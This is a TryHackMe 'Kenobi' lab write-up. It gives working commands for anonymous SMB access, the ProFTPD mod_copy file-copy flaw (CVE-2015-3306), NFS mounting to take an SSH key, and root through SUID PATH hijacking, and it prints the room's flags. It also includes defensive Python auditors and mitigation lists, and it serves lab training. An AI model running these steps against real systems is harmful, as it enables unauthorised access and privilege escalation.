Kenobi

A comprehensive guide to exploiting Samba misconfigurations, ProFTPD vulnerabilities, and SUID binaries on a Linux machine.

Kenobi - TryHackMe Writeup

Kenobi is an intermediate-level room that teaches exploitation of multiple services including Samba, ProFTPD, and NFS, culminating in privilege escalation through SUID binaries.

Difficulty: Medium ⭐⭐
Operating System: Linux (Ubuntu)
Themes: SMB Enumeration, FTP Exploitation, NFS Mounting, SUID Privilege Escalation


Objectives

  1. Enumerate SMB shares and extract sensitive information
  2. Exploit ProFTPD misconfiguration
  3. Mount NFS shares to access stolen files
  4. Escalate privileges using SUID binary misconfiguration

Reconnaissance

Initial Port Scan

Started with a comprehensive port scan:

nmap -p- --min-rate 10000 10.10.23.89

Results:

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
[Various high ports open for RPC services]

Service Version Detection

Ran detailed service enumeration:

nmap -p 21,22,80,111,139,445 -sCV 10.10.23.89

Key Findings:

  • Port 21: ProFTPD 1.3.5
  • Port 22: OpenSSH 7.2p2
  • Port 80: Apache 2.4.18 with /admin.html in robots.txt
  • Port 111: rpcbind service
  • Ports 139/445: Samba 4.3.11-Ubuntu

SMB Enumeration

Discovering SMB Shares

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.194.61

Discovered Shares:

\\10.10.23.89\anonymous
Type: STYPE_DISKTREE
Path: C:\home\kenobi\share
Anonymous access: READ/WRITE

Accessing SMB Share

Connected to the anonymous share:

smbclient //10.10.23.89/anonymous

Files Found:

  • log.txt - Contains sensitive information including SSH private key path

Extracted Information:

  • SSH private key location: /home/kenobi/.ssh/id_rsa

NFS Enumeration

Discovering NFS Exports

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.23.89

Results:

NFS Export: /var *

The /var directory is exported via NFS to any host (the * client specifier), so anyone who can reach port 2049 can mount and read it.


ProFTPD Exploitation

FTP Service Analysis

ProFTPD 1.3.5 has a known vulnerability (CVE-2015-3306) that allows arbitrary file copy using the SITE CPFR and SITE CPTO commands.

Exploiting the Vulnerability

Connected to FTP service and copied the SSH private key:

telnet 10.10.23.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.23.89]

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

SITE CPTO /var/tmp/id_rsa
250 Copy successful

Accessing the Copied File

Mounted the NFS share to access the copied SSH key:

sudo mount -t nfs 10.10.23.89:/var /mnt

Located the SSH private key:

ls /mnt/tmp/
id_rsa

SSH Access

Used the stolen SSH key to gain access:

sudo ssh -i /mnt/tmp/id_rsa kenobi@10.10.23.89

Initial Access Obtained:

kenobi@kenobi:~$ whoami
kenobi

kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

User flag captured!


Privilege Escalation

SUID Enumeration

Looked for SUID binaries:

find / -type f -perm -u=s 2>/dev/null

Interesting Finding:

/usr/bin/menu

Analyzing the SUID Binary

Running the binary reveals its functionality:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

Path Hijacking Exploitation

The binary likely invokes its helper commands (curl, uname, ifconfig) by bare name rather than by absolute path, so they are resolved through the PATH environment variable while the binary runs as root. We can exploit this by manipulating PATH.

  1. Create a malicious curl binary in a writable directory:
    echo "/bin/bash" > /tmp/curl
    chmod +x /tmp/curl
  2. Prepend that directory to the PATH environment variable:
    export PATH=/tmp:$PATH
  3. Execute the SUID binary:
    /usr/bin/menu
  4. Select option 1 (status check):
    ** Enter your choice :1

Root Access Obtained

root@kenobi:/tmp# whoami
root

root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Root Flag Capture

root@kenobi:/# cat /root/root.txt
177b3cd8562289f37382721c28381f02

Root flag captured!
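The weakness behind the privilege escalation above (a SUID helper that names curl without an absolute path) is something a defender can hunt for before anyone else does. The following is an added example, not code from the room or from this writeup's author: it lists set-user-ID files under a directory the way the find command above does, pulls printable strings out of each file like strings(1), and flags any string whose first word is a common command given by bare name. The KNOWN_COMMANDS set and the FAKE_BINARY byte blob are constructed for the demo; the real /usr/bin/menu is not read or assumed.

```python
"""Audit SUID files for external commands invoked by bare name.
Added example, not the room's or the author's code; the 'binary' it
inspects is a constructed byte blob standing in for a SUID helper."""
import os
import re
import stat
import tempfile

# Commands a privileged helper commonly shells out to. Constructed list.
KNOWN_COMMANDS = {"curl", "uname", "ifconfig", "ip", "ls", "cat", "ps", "sh", "bash"}

# Constructed stand-in for a SUID binary: non-printable padding around the
# string literals a C program would hand to system(). Two calls use bare
# command names, one uses an absolute path.
FAKE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
               + b"curl -I localhost\x00"
               + b"uname -r\x00"
               + b"/sbin/ifconfig\x00"
               + b"** Enter your choice :\x00"
               + b"\x00" * 8)


def extract_strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def bare_command_invocations(data):
    """Strings whose first word is a known command without a leading '/'.
    '/sbin/ifconfig' is not flagged because its first word is an absolute path."""
    hits = []
    for s in extract_strings(data):
        words = s.split()
        if words and words[0] in KNOWN_COMMANDS:
            hits.append(s)
    return hits


def find_suid_files(root):
    """Walk root and return regular files carrying the set-user-ID bit."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid_tree(root):
    """Map each SUID file under root to the bare command strings found in it."""
    report = {}
    for path in find_suid_files(root):
        with open(path, "rb") as fh:
            hits = bare_command_invocations(fh.read())
        if hits:
            report[path] = hits
    return report


def make_demo_tree():
    """Constructed fixture: a scratch directory holding FAKE_BINARY once as a
    SUID file and once without the bit. Returns (directory, suid_file_path)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    suid_path = os.path.join(root, "menu")
    plain_path = os.path.join(root, "menu-nosuid")
    for p in (suid_path, plain_path):
        with open(p, "wb") as fh:
            fh.write(FAKE_BINARY)
    os.chmod(suid_path, 0o4755)   # set-user-ID bit on, like /usr/bin/menu
    os.chmod(plain_path, 0o755)
    return root, suid_path


if __name__ == "__main__":
    demo_root, _ = make_demo_tree()
    for path, hits in audit_suid_tree(demo_root).items():
        print(path, "->", hits)
```

Point audit_suid_tree at / on a real host to get the same report for every SUID file on the system; a hit means the program should be rebuilt to call its helpers by absolute path (or to reset PATH to a fixed value before doing so), which is the mitigation listed under Key Takeaways.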


Key Takeaways

Attack Path Summary:

Port Scanning → SMB Enumeration → Information Disclosure →
ProFTPD Exploitation → NFS Mounting → SSH Access →
SUID Enumeration → Path Hijacking → Root Access

Vulnerabilities Exploited:

  1. SMB Misconfiguration - Anonymous read/write access to shares
  2. ProFTPD Vulnerability - Arbitrary file copy (CVE-2015-3306)
  3. NFS Misconfiguration - World-readable /var export
  4. SUID Binary Weakness - Relative path usage without validation
  5. PATH Environment Manipulation - Lack of absolute paths in SUID binary

Mitigation Strategies:

  1. For SMB:
    • Disable anonymous access
    • Implement proper share permissions
    • Regular security audits
  2. For ProFTPD:
    • Update to latest version
    • Restrict FTP commands
    • Implement chroot environments
  3. For NFS:
    • Restrict exports to specific IPs
    • Use read-only permissions where possible
    • Implement NFSv4 with Kerberos
  4. For SUID Binaries:
    • Use absolute paths in scripts
    • Regular SUID binary audits
    • Principle of least privilege
    • Consider capabilities instead of SUID where possible
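The first three mitigation items (SMB, ProFTPD, NFS) can be checked mechanically against the configuration files they concern. The following is an added example, not code from the room or from this writeup's author: it parses smb.conf share sections for guest access, /etc/exports entries for wildcard clients and no_root_squash, and proftpd.conf for mod_copy being loaded without a Limit on SITE_CPFR/SITE_CPTO (the directive form ProFTPD's mod_copy documents for restricting those commands). Every configuration fragment below is constructed for illustration and was not taken from the Kenobi machine.

```python
"""Audit Samba, NFS and ProFTPD configuration text for the three service
misconfigurations the room exposes. Added example, not the room's or the
author's code; all configuration fragments are constructed."""
import re

# Constructed smb.conf fragment: one share that guests may read and write.
SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = no
   guest ok = yes

[printers]
   path = /var/spool/samba
   guest ok = no
"""

# Constructed /etc/exports: /var handed to every host, plus a sane export.
NFS_EXPORTS = """
/var *(rw,sync,no_root_squash)
/srv/public 10.10.0.0/16(ro,sync,root_squash)
"""

# Constructed proftpd.conf: mod_copy loaded, SITE CPFR/CPTO not limited.
PROFTPD_WEAK = """
ServerName "ProFTPD Default Installation"
LoadModule mod_copy.c
"""

# Same file with the mod_copy SITE commands denied to everyone.
PROFTPD_HARDENED = PROFTPD_WEAK + """
<Limit SITE_CPFR SITE_CPTO>
  DenyAll
</Limit>
"""


def parse_smb_shares(text):
    """Return {share: {option: value}} for every [section] except [global]."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).lower()
            shares[current] = {}
        elif current is not None and "=" in line:
            key, value = (part.strip().lower() for part in line.split("=", 1))
            shares[current][key] = value
    shares.pop("global", None)
    return shares


def audit_smb(text):
    """Flag shares reachable without credentials (guest ok / public = yes)."""
    findings = []
    for name, opts in parse_smb_shares(text).items():
        guest = "yes" in (opts.get("guest ok"), opts.get("public"))
        writable = (opts.get("read only") == "no"
                    or "yes" in (opts.get("writable"), opts.get("writeable")))
        if guest:
            access = "read/write" if writable else "read"
            findings.append(f"smb: share [{name}] allows anonymous {access}")
    return findings


def audit_exports(text):
    """Flag NFS exports open to any host or granting no_root_squash."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:   # a path with no client is world-exported
            host, _, opts = client.partition("(")
            options = set(opts.rstrip(")").split(",")) if opts else set()
            if host in ("", "*"):
                findings.append(f"nfs: {path} exported to any host")
            if "no_root_squash" in options:
                findings.append(f"nfs: {path} exported with no_root_squash to {host or '*'}")
    return findings


def audit_proftpd(text):
    """Flag mod_copy being loaded while SITE CPFR/CPTO remain unrestricted."""
    if not re.search(r"^\s*LoadModule\s+mod_copy\.c", text, re.M):
        return []
    for names, body in re.findall(r"<Limit([^>]*)>(.*?)</Limit>", text, re.S | re.I):
        names = names.upper()
        if "SITE_CPFR" in names and "SITE_CPTO" in names and re.search(r"\bDenyAll\b", body, re.I):
            return []
    return ["proftpd: mod_copy loaded and SITE_CPFR/SITE_CPTO are not denied"]


def audit_all(smb, exports, proftpd):
    return audit_smb(smb) + audit_exports(exports) + audit_proftpd(proftpd)


if __name__ == "__main__":
    for finding in audit_all(SMB_CONF, NFS_EXPORTS, PROFTPD_WEAK):
        print(finding)
```

Running it against the weak fragments reports the anonymous read/write share, the world-exported /var with no_root_squash, and the unrestricted mod_copy; swapping PROFTPD_HARDENED in clears the ProFTPD finding, which is the configuration change the "Restrict FTP commands" item refers to (upgrading past 1.3.5 remains the primary fix for CVE-2015-3306).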

Tools Used:

  • Nmap - Port scanning and service enumeration
  • smbclient - SMB share access
  • mount - NFS share mounting
  • SSH - Remote access with stolen key
  • Path manipulation - SUID exploitation

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.